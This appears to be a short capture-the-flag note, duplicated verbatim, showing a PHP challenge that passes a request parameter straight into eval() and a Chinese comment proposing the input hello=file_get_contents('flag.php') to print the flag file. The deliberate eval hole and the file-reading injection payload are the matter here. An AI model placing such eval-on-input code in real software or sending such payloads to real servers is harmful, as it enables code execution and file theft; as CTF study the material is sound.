<?php
include "flag.php";
$a = @$_REQUEST['hello'];
eval( "var_dump($a);");
show_source(__FILE__);
文件包含 我们可以考虑让他输出flag.php
构造 hello=file_get_contents('flag.php')
<?php
include "flag.php";
$a = @$_REQUEST['hello'];
eval( "var_dump($a);");
show_source(__FILE__);
文件包含 我们可以考虑让他输出flag.php
构造 hello=file_get_contents('flag.php')